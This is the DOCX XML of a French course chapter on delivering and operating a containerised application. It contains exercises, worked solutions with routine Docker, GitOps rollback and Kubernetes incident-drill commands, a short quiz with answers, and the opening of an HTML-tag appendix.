        <w:t>L'essentiel du chapitre</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projet se juge sur le système livré, pas sur le code seul.</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Trois dossiers séparent application, infrastructure et déploiement.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L'image se construit en plusieurs étapes et s'exécute sans privilèges.</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pipeline publie un artefact signé, il ne déploie pas directement.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L'état Terraform est distant et verrouillé.</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 déploiement converge depuis Git.</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Les quatre signaux d'or structurent la supervision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="312" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un runbook et un retour arrière chronométré font partie du livrable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cours se termine ici. Les annexes rassemblent les aides méthodologiques : glossaire, aide-mémoire et grille d'auto-évaluation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreRubrique"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Exercices d'application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les exercices suivants se traitent avec un éditeur de texte et un navigateur récent. Les corrigés détaillés figurent immédiatement après, avec les explications de chaque décision technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 93.1 — Jalon 1 — Construire et tester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'application doit se construire et se tester sans intervention.</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Écrivez le Dockerfile.</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Exécutez les tests.</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Vérifiez l'utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 93.2 — Jalon 4 — Déployer et revenir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   PROJET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une version doit être déployée puis remplacée.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Déployez la version A.</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Déployez la version B.</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Revenez à A et chronométrez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 93.3 — Jalon 6 — Simuler un incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   INCIDENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Provoquez une panne et documentez la réponse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>1.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Coupez un pod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>2.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Suivez l'alerte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Rédigez l'analyse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreRubrique"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Corrigés détaillés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque corrigé justifie les choix de structure, de style et de code. Plusieurs solutions restent valables : l'important est de comprendre la raison de chaque décision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 93.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>docker build -t app:local .</w:t>
        <w:br/>
        <w:t>docker run --rm app:local npm test</w:t>
        <w:br/>
        <w:t>docker run --rm --user 1000 app:local id</w:t>
        <w:br/>
        <w:t># attendu : uid=1000, pas root</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker images app:local</w:t>
        <w:br/>
        <w:t># attendu : moins de 200 Mo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'image finale ne contient que les dépendances de production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conteneur qui tourne en root est un défaut de sécurité, même en développement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 93.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Version A</w:t>
        <w:br/>
        <w:t># kustomization.yaml → newTag: "a1b2c3d"</w:t>
        <w:br/>
        <w:t>git commit -am "production: 1.4.1"</w:t>
        <w:br/>
        <w:t>git push &amp;&amp; argocd app sync plateforme-production</w:t>
        <w:br/>
        <w:br/>
        <w:t># Version B</w:t>
        <w:br/>
        <w:t># kustomization.yaml → newTag: "b2c3d4e"</w:t>
        <w:br/>
        <w:t>git commit -am "production: 1.4.2"</w:t>
        <w:br/>
        <w:t>git push &amp;&amp; argocd app sync plateforme-production</w:t>
        <w:br/>
        <w:br/>
        <w:t># Retour arrière</w:t>
        <w:br/>
        <w:t>git revert --no-edit HEAD &amp;&amp; git push</w:t>
        <w:br/>
        <w:t>argocd app sync plateforme-production</w:t>
        <w:br/>
        <w:t>time kubectl rollout status deployment/api -n production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le retour arrière par Git reste convergent : aucune modification manuelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le temps mesuré doit être inférieur à cinq minutes, synchronisation comprise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 93.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>## Simulation</w:t>
        <w:br/>
        <w:t>- Action : suppression d'un pod de l'API</w:t>
        <w:br/>
        <w:t>- Détection : alerte de disponibilité en 40 s</w:t>
        <w:br/>
        <w:t>- Impact : aucune erreur visible (3 réplicas)</w:t>
        <w:br/>
        <w:t>- Résolution : recréation automatique en 25 s</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Enseignements</w:t>
        <w:br/>
        <w:t>- Le readiness probe évite d'envoyer du trafic trop tôt</w:t>
        <w:br/>
        <w:t>- L'alerte aurait dû préciser le nombre de réplicas disponibles</w:t>
        <w:br/>
        <w:t>- Action : ajouter l'alerte « réplicas disponibles &lt; 2 »</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une panne sans impact reste instructive : elle révèle les marges réelles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'analyse doit citer les délais mesurés, pas des impressions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreRubrique"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quiz de vérification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une seule réponse est exacte par question. Répondez sans revenir au texte, puis consultez les explications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Question"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Que doit permettre le dépôt seul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Compiler le code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Reconstruire le système</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Remplacer Kubernetes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Générer la documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Question"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pourquoi séparer application, infrastructure et déploiement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Pour la mode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Pour éviter les effets de bord entre changements</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Pour réduire les coûts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Pour la sécurité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Question"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Que doit faire le pipeline vis-à-vis du déploiement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Déployer directement</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Publier un artefact signé</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Modifier le cluster</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Redémarrer les pods</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Question"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Que mesure le retour arrière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La taille de l'image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Le temps de restauration</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Le nombre de commits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La couverture de tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Question"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Quel signal d'or est lié aux ressources ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Latence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Trafic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Erreurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">D) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Saturation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreRubrique"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Réponses et explications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La reproductibilité complète est le critère central.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un changement de code ne doit pas modifier l'infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le déploiement passe par Git et l'agent de réconciliation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> C'est un objectif mesurable du projet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La saturation décrit l'utilisation des ressources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId150"/>
          <w:footerReference w:type="default" r:id="rId151"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Annexe A — Mémento des balises HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ce mémento regroupe les balises utilisées dans le volume. La colonne « Usage » indique le contexte recommandé ; une balise mal employée nuit autant qu'une balise absente.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3005"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
